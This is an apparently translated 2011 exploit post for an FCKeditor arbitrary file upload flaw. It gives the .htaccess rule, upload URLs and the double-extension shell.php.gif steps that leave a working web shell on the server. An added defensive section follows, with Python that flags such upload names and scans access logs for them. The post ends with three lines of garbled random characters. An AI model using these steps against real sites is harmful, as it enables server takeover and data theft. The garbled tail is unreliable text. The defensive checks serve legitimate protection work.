FCKeditor upload vulnerability (all PHP versions)
Author: Anonymous  Source: compiled by this site  Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create an .htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2. Now upload this .htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After uploading shell.php.gif, the name "shell.php.gif" is changed to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. The shell is now available on the server.
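An added example from the defender's side, not part of the original post: an upload-name check that refuses the two names the steps above depend on (a dotfile such as .htaccess, and a double extension such as shell.php.gif, including FCKeditor's renamed form shell_php.gif), plus a scan of access-log lines for requests to such disguised files. The log lines and the /userfiles/image/ path are constructed for this example.

```python
import re
from typing import List, Optional, Tuple

# Extensions the web server may hand to a script interpreter (constructed
# list for this example; match it to the handlers on your own server).
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "asp", "aspx", "jsp", "cgi", "pl"}

# Request line and status code of an Apache/nginx combined-format log entry
LOG_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def is_unsafe_upload_name(name: str) -> Optional[str]:
    """Reason to refuse an upload filename, or None if it looks harmless.

    Covers the two names the .htaccess trick needs: a dotfile that
    reconfigures the upload directory, and a double extension whose script
    part survives FCKeditor's '.' -> '_' rename (shell.php.gif becomes
    shell_php.gif, which a FilesMatch "_php.gif" handler still executes).
    """
    base = name.rsplit("/", 1)[-1]
    if base.startswith("."):
        return "dotfile such as .htaccess"
    # Split on both '.' and '_' so the original and the renamed form are caught
    tokens = set(re.split(r"[._]", base.lower()))
    if tokens & SCRIPT_EXTS:
        return "script extension embedded in filename"
    return None

def find_suspicious_requests(log_lines: List[str]) -> List[Tuple[str, str]]:
    """(path, status) for requests to dotfiles or script names hidden behind
    a non-script extension; a 200 for '*_php.gif' is step 5 seen in the log."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.search(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]
        base = path.rsplit("/", 1)[-1]
        ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
        # Plain .php requests are normal traffic; only disguised names are flagged
        if ext not in SCRIPT_EXTS and is_unsafe_upload_name(path):
            hits.append((path, m.group("status")))
    return hits

# Constructed sample log lines (not from the original post)
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Oct/2011:07:39:07 +0800] "GET /userfiles/image/photo.gif HTTP/1.1" 200 5120',
    '10.0.0.5 - - [25/Oct/2011:07:39:20 +0800] "GET /userfiles/image/shell_php.gif HTTP/1.1" 200 311',
    '10.0.0.5 - - [25/Oct/2011:07:39:31 +0800] "GET /index.php HTTP/1.1" 200 2048',
]
```

The name check only closes the upload side; the upload directory itself should also be served with AllowOverride None and with the PHP handler disabled so that a stray .htaccess or renamed file is never executed.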
+ q" y, Y$ l+ Z4 z) p2 z7 g
' V( Q( F+ E$ d! l6 L) A
9 [- q9 F* T* b- y& b; j! l |